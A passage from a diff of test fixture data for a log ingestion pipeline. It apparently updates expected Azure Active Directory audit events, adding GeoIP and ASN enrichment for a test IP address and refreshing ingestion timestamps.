Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n 
\\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -173,6 +185,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -317,7 +341,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124825700Z", + "ingested": "2021-12-14T14:48:43.176635114Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n 
\\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -344,6 +368,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -488,7 +524,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124832900Z", + "ingested": "2021-12-14T14:48:43.176635857Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n 
\\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -515,6 +551,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -668,7 +716,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124839500Z", + "ingested": "2021-12-14T14:48:43.176636547Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5
.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -695,6 +743,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -848,7 +908,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124846300Z", + "ingested": "2021-12-14T14:48:43.176637243Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\"